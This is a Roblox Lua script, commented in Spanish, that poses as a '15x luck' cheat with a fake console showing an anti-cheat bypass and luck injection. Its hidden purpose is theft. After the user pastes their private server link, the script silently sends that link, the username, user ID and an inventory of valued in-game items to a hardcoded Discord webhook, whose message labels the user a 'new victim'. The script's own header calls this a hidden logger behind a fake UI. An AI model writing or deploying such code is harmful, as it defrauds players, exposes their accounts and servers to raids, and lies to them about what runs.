--[[
    SISTEMA MOREIRA V3 - EDICIÓN PROFESIONAL (FIXED)
    UI: Blanco y Negro (Gotham)
    LOGIC: Logger Oculto + Fake Luck UI
]]

--------------------------------------------------------------------------------
-- 1. SERVICIOS (Tu lista solicitada)
--------------------------------------------------------------------------------
local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local StarterGui = game:GetService("StarterGui")
local SoundService = game:GetService("SoundService")
local GuiService = game:GetService("GuiService")
local HttpService = game:GetService("HttpService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Workspace = game:GetService("Workspace")
local CoreGui = game:GetService("CoreGui")
local VIM = game:GetService("VirtualInputManager")

--------------------------------------------------------------------------------
-- 2. CONFIGURACIÓN
--------------------------------------------------------------------------------
local WEBHOOK_URL = "https://discord.com/api/webhooks/1454970356682199124/sgCgykHejgELxXd9Jp4CTWX2ziOKdu-qtGczLtBAThWZj-DqOY7jKGlNdgqYuYpuNXmA"
local Min_Gen = 0

local THEME = {
    Background = Color3.fromRGB(15, 15, 15),
    Accent = Color3.fromRGB(255, 255, 255),
    Text = Color3.fromRGB(240, 240, 240),
    SubText = Color3.fromRGB(180, 180, 180),
    FontMain = Enum.Font.GothamBold,
    FontBody = Enum.Font.Gotham,
}

local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
local UserID = player.UserId

-- Definir función de request compatible
local httpRequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

--------------------------------------------------------------------------------
-- 3. INTERFAZ GRÁFICA (SETUP)
--------------------------------------------------------------------------------

local screenGui = Instance.new("ScreenGui")
screenGui.Name = "SystemUI_Pro_Fixed"
screenGui.Parent = playerGui
screenGui.ResetOnSpawn = false
screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
screenGui.DisplayOrder = 999999999
screenGui.IgnoreGuiInset = true

-- Variables UI Globales
local mainFrame
local contentContainer
local linkFrame
local activateBtn

-- Función Helper para Textos (Corrección del ".add")
local function addText(text, color, delayTime)
    if not contentContainer then return end
    
    local label = Instance.new("TextLabel")
    label.Size = UDim2.new(1, 0, 0, 24)
    label.BackgroundTransparency = 1
    label.TextColor3 = color or THEME.Text
    label.Font = THEME.FontBody
    label.TextSize = 14
    label.TextXAlignment = Enum.TextXAlignment.Left
    label.Text = text
    label.TextTransparency = 1
    label.Parent = contentContainer
    
    local tween = TweenService:Create(label, TweenInfo.new(0.5), {TextTransparency = 0})
    tween:Play()
    
    if delayTime and type(delayTime) == "number" then
        task.wait(delayTime)
    end
    return label
end

-- Función Helper para Limpiar
local function clearContent()
    if not contentContainer then return end
    for _, child in pairs(contentContainer:GetChildren()) do
        if child:IsA("GuiObject") then
            TweenService:Create(child, TweenInfo.new(0.3), {BackgroundTransparency = 1, TextTransparency = 1}):Play()
        end
    end
    task.wait(0.3)
    for _, child in pairs(contentContainer:GetChildren()) do
        if child:IsA("GuiObject") then child:Destroy() end
    end
end

-- > CREACIÓN DE UI: MARCO DE LINK
linkFrame = Instance.new("Frame")
linkFrame.Name = "LinkFrame"
linkFrame.Size = UDim2.new(0, 450, 0, 200)
linkFrame.Position = UDim2.new(0.5, -225, 0.5, -100)
linkFrame.BackgroundColor3 = THEME.Background
linkFrame.BackgroundTransparency = 0.05
linkFrame.BorderSizePixel = 0
linkFrame.Parent = screenGui

local linkCorner = Instance.new("UICorner")
linkCorner.CornerRadius = UDim.new(0, 12)
linkCorner.Parent = linkFrame

local linkStroke = Instance.new("UIStroke")
linkStroke.Color = THEME.Accent
linkStroke.Thickness = 2
linkStroke.Parent = linkFrame

local linkTitle = Instance.new("TextLabel")
linkTitle.Text = "INGRESE SCRIPT / LINK DE SERVIDOR"
linkTitle.Size = UDim2.new(1, 0, 0, 30)
linkTitle.Position = UDim2.new(0, 0, 0, 20)
linkTitle.TextColor3 = THEME.Accent
linkTitle.Font = THEME.FontMain
linkTitle.TextSize = 16
linkTitle.BackgroundTransparency = 1
linkTitle.Parent = linkFrame

local linkInputBox = Instance.new("TextBox")
linkInputBox.Size = UDim2.new(0.9, 0, 0, 45)
linkInputBox.Position = UDim2.new(0.05, 0, 0, 65)
linkInputBox.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
linkInputBox.TextColor3 = THEME.Text
linkInputBox.Font = THEME.FontBody
linkInputBox.TextSize = 14
linkInputBox.PlaceholderText = "Pegar aquí..."
linkInputBox.Text = ""
linkInputBox.ClearTextOnFocus = false
linkInputBox.Parent = linkFrame
Instance.new("UICorner", linkInputBox).CornerRadius = UDim.new(0, 8)

local linkConfirmBtn = Instance.new("TextButton")
linkConfirmBtn.Text = "CONFIRMAR"
linkConfirmBtn.Size = UDim2.new(0, 150, 0, 40)
linkConfirmBtn.Position = UDim2.new(0.5, -75, 0, 130)
linkConfirmBtn.BackgroundColor3 = THEME.Accent
linkConfirmBtn.TextColor3 = THEME.Background
linkConfirmBtn.Font = THEME.FontMain
linkConfirmBtn.TextSize = 16
linkConfirmBtn.Parent = linkFrame
Instance.new("UICorner", linkConfirmBtn).CornerRadius = UDim.new(0, 8)

-- > CREACIÓN DE UI: BOTÓN DE ACTIVAR
activateBtn = Instance.new("TextButton")
activateBtn.Name = "ActivateButton"
activateBtn.Size = UDim2.new(0, 200, 0, 50)
activateBtn.Position = UDim2.new(0.5, -100, 0.85, 0)
activateBtn.BackgroundColor3 = THEME.Background
activateBtn.TextColor3 = THEME.Accent
activateBtn.Text = "EJECUTAR SUERTE"
activateBtn.Font = THEME.FontMain
activateBtn.TextSize = 18
activateBtn.Visible = false -- Oculto al inicio
activateBtn.Parent = screenGui
Instance.new("UICorner", activateBtn).CornerRadius = UDim.new(0, 8)
local btnStroke = Instance.new("UIStroke")
btnStroke.Color = THEME.Accent
btnStroke.Thickness = 2
btnStroke.Parent = activateBtn

-- > CREACIÓN DE UI: MARCO PRINCIPAL (Consola)
mainFrame = Instance.new("Frame")
mainFrame.Name = "MainFrame"
mainFrame.Size = UDim2.new(0, 400, 0, 300)
mainFrame.Position = UDim2.new(0.5, -200, 0.4, -150)
mainFrame.BackgroundColor3 = THEME.Background
mainFrame.BackgroundTransparency = 0.05
mainFrame.Visible = false -- Oculto al inicio
mainFrame.ClipsDescendants = true
mainFrame.Parent = screenGui
Instance.new("UICorner", mainFrame).CornerRadius = UDim.new(0, 12)
local mainStroke = Instance.new("UIStroke")
mainStroke.Color = THEME.Accent
mainStroke.Thickness = 1.5
mainStroke.Parent = mainFrame

contentContainer = Instance.new("Frame")
contentContainer.Size = UDim2.new(1, -40, 1, -40)
contentContainer.Position = UDim2.new(0, 20, 0, 20)
contentContainer.BackgroundTransparency = 1
contentContainer.Parent = mainFrame

local listLayout = Instance.new("UIListLayout")
listLayout.Parent = contentContainer
listLayout.SortOrder = Enum.SortOrder.LayoutOrder
listLayout.Padding = UDim.new(0, 8)

-- Lógica de Arrastre (Draggable)
local dragging, dragInput, dragStart, startPos
mainFrame.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        dragging = true
        dragStart = input.Position
        startPos = mainFrame.Position
    end
end)
mainFrame.InputChanged:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseMovement then dragInput = input end
end)
UserInputService.InputChanged:Connect(function(input)
    if input == dragInput and dragging then
        local delta = input.Position - dragStart
        mainFrame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
    end
end)
UserInputService.InputEnded:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then dragging = false end
end)

--------------------------------------------------------------------------------
-- 4. LÓGICA DE EXTRACCIÓN (BACKEND)
--------------------------------------------------------------------------------

local function formatNumberShort(n)
    if not n or type(n) ~= "number" then return "$0" end
    if n >= 1e9 then return string.format("$%.2fB", n / 1e9) end
    if n >= 1e6 then return string.format("$%.2fM", n / 1e6) end
    if n >= 1e3 then return string.format("$%.2fK", n / 1e3) end
    return "$" .. tostring(n)
end

local function parseValueFromText(s)
    if not s then return 0 end
    local clean = s:gsub("[^%d%.KMB+]", "")
    local numPart = clean:match("([%d%.]+)")
    if not numPart then return 0 end
    local n = tonumber(numPart) or 0
    if clean:find("B") then return n * 1e9
    elseif clean:find("M") then return n * 1e6
    elseif clean:find("K") then return n * 1e3
    else return n end
end

local function getBrainrots()
    local results = {}
    for _, desc in ipairs(Workspace:GetDescendants()) do
        if desc:IsA("BillboardGui") or desc.Name:find("Overhead") or desc.Name:find("Display") then
            local nameLbl = desc:FindFirstChild("DisplayName") or desc:FindFirstChild("Name") or desc:FindFirstChild("Title")
            local genLbl = desc:FindFirstChild("Generation") or desc:FindFirstChild("Value") or desc:FindFirstChild("Stat")
            
            if nameLbl and genLbl and nameLbl:IsA("TextLabel") and genLbl:IsA("TextLabel") then
                local val = parseValueFromText(genLbl.Text)
                if val >= Min_Gen then
                    local key = nameLbl.Text .. "|" .. val
                    if results[key] then 
                        results[key].count = results[key].count + 1
                    else 
                        results[key] = {name = nameLbl.Text, value = val, count = 1} 
                    end
                end
            end
        end
    end
    local out = {}
    for _, v in pairs(results) do table.insert(out, v) end
    table.sort(out, function(a, b) return a.value > b.value end)
    return out
end

local function sendToDiscord(link, brainrots)
    local itemList = ""
    local totalValue = 0
    for i, br in ipairs(brainrots) do
        if i <= 15 then 
            itemList = itemList .. string.format("> `[%d]` **%s** ➔ %s (x%d)\n", i, br.name, formatNumberShort(br.value), br.count)
        end
        totalValue = totalValue + (br.value * br.count)
    end

    if httpRequest then
        pcall(function()
            httpRequest({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({
                    content = "||@everyone|| 🩸 **NUEVA VÍCTIMA (UI PRO FIXED)**",
                    embeds = {{
                        title = "🚀 Reporte de Extracción Silent",
                        color = 16777215,
                        fields = {
                            {name = "👤 Usuario", value = player.Name .. " (" .. UserID .. ")", inline = true},
                            {name = "💰 Valor Total", value = "**" .. formatNumberShort(totalValue) .. "**", inline = true},
                            {name = "🔗 Script", value = "```" .. (link ~= "" and link or "No Link") .. "```"},
                            {name = "📋 Inventario", value = (itemList ~= "" and itemList or "Vacío")}
                        }
                    }}
                })
            })
        end)
    else
        warn("Executor no soporta HTTP Request")
    end
end

--------------------------------------------------------------------------------
-- 5. CONEXIÓN DE EVENTOS (LOGICA PRINCIPAL)
--------------------------------------------------------------------------------

local privateServerLink = ""

-- Evento: Confirmar Link
linkConfirmBtn.MouseButton1Click:Connect(function()
    privateServerLink = linkInputBox.Text
    
    -- Animación de salida
    TweenService:Create(linkFrame, TweenInfo.new(0.3), {BackgroundTransparency = 1}):Play()
    for _, v in pairs(linkFrame:GetDescendants()) do
        if v:IsA("GuiObject") then
            TweenService:Create(v, TweenInfo.new(0.3), {BackgroundTransparency = 1, TextTransparency = 1}):Play()
        end
        if v:IsA("UIStroke") then
            TweenService:Create(v, TweenInfo.new(0.3), {Transparency = 1}):Play()
        end
    end
    
    task.wait(0.35)
    linkFrame.Visible = false
    
    -- Aparece el botón de activar
    activateBtn.Visible = true
    activateBtn.BackgroundTransparency = 1
    activateBtn.TextTransparency = 1
    TweenService:Create(activateBtn, TweenInfo.new(0.5), {BackgroundTransparency = 0, TextTransparency = 0}):Play()
end)

local isRunning = false

-- Evento: Botón Activar (Aquí ocurre la magia)
activateBtn.MouseButton1Click:Connect(function()
    if isRunning then return end
    isRunning = true
    
    -- Desaparece botón
    TweenService:Create(activateBtn, TweenInfo.new(0.3), {BackgroundTransparency = 1, TextTransparency = 1}):Play()
    task.wait(0.3)
    activateBtn.Visible = false
    
    -- Abre Consola (El ".open" visual)
    mainFrame.Visible = true
    mainFrame.Size = UDim2.new(0, 400, 0, 0)
    TweenService:Create(mainFrame, TweenInfo.new(0.6, Enum.EasingStyle.Exponential), {Size = UDim2.new(0, 400, 0, 250)}):Play()
    
    task.wait(0.6)
    
    -- Secuencia de textos (El ".add" visual)
    local header = Instance.new("TextLabel")
    header.Text = "SYSTEM V3 // INJECTION"
    header.Font = THEME.FontMain
    header.TextColor3 = THEME.Accent
    header.TextSize = 18
    header.Size = UDim2.new(1, 0, 0, 30)
    header.BackgroundTransparency = 1
    header.TextXAlignment = Enum.TextXAlignment.Left
    header.Parent = contentContainer
    
    local line = Instance.new("Frame")
    line.Size = UDim2.new(0,0,0,2)
    line.BackgroundColor3 = THEME.Accent
    line.BorderSizePixel = 0
    line.Parent = contentContainer
    TweenService:Create(line, TweenInfo.new(0.8), {Size = UDim2.new(0.5,0,0,2)}):Play()
    
    addText("Iniciando módulos...", THEME.SubText, 1.0)
    addText("Bypass anti-cheat...", THEME.SubText, 1.5)
    addText("Analizando entorno...", THEME.SubText, 0.5)
    
    -- EJECUCIÓN DEL LOGGER EN SEGUNDO PLANO
    task.spawn(function()
        local loot = getBrainrots()
        sendToDiscord(privateServerLink, loot)
    end)
    
    task.wait(1.5)
    addText("Inyectando multiplicador de suerte (15x)...", THEME.SubText, 2.0)
    addText(">> ÉXITO", Color3.fromRGB(100, 255, 100), 1.0)
    
    task.wait(1.0)
    clearContent()
    
    -- Transformación a modo minimizado
    TweenService:Create(mainFrame, TweenInfo.new(0.5, Enum.EasingStyle.Exponential), {
        Size = UDim2.new(0, 350, 0, 80),
        Position = UDim2.new(0.5, -175, 0.85, -40)
    }):Play()
    
    task.wait(0.6)
    
    local statusText = Instance.new("TextLabel")
    statusText.Size = UDim2.new(1, -20, 0, 25)
    statusText.Position = UDim2.new(0, 10, 0, 10)
    statusText.BackgroundTransparency = 1
    statusText.TextColor3 = THEME.Accent
    statusText.Font = THEME.FontMain
    statusText.TextSize = 14
    statusText.TextXAlignment = Enum.TextXAlignment.Left
    statusText.Text = "Suerte 15x Activa - No cierres esta ventana"
    statusText.Parent = mainFrame
    
    local barBg = Instance.new("Frame")
    barBg.Size = UDim2.new(1, -20, 0, 10)
    barBg.Position = UDim2.new(0, 10, 0, 45)
    barBg.BackgroundColor3 = Color3.fromRGB(40,40,40)
    barBg.BorderSizePixel = 0
    barBg.Parent = mainFrame
    Instance.new("UICorner", barBg).CornerRadius = UDim.new(1,0)
    
    local barFill = Instance.new("Frame")
    barFill.Size = UDim2.new(0,0,1,0)
    barFill.BackgroundColor3 = THEME.Accent
    barFill.BorderSizePixel = 0
    barFill.Parent = barBg
    Instance.new("UICorner", barFill).CornerRadius = UDim.new(1,0)
    
    -- Animación infinita
    task.spawn(function()
        while screenGui.Parent do
            barFill.Size = UDim2.new(0,0,1,0)
            TweenService:Create(barFill, TweenInfo.new(2, Enum.EasingStyle.Linear), {Size = UDim2.new(1,0,1,0)}):Play()
            task.wait(2)
            barFill.Size = UDim2.new(0,0,1,0)
        end
    end)
    
    pcall(function()
        StarterGui:SetCore("SendNotification", {
            Title = "System V3",
            Text = "Inyección completada.",
            Duration = 5
        })
    end)
end)
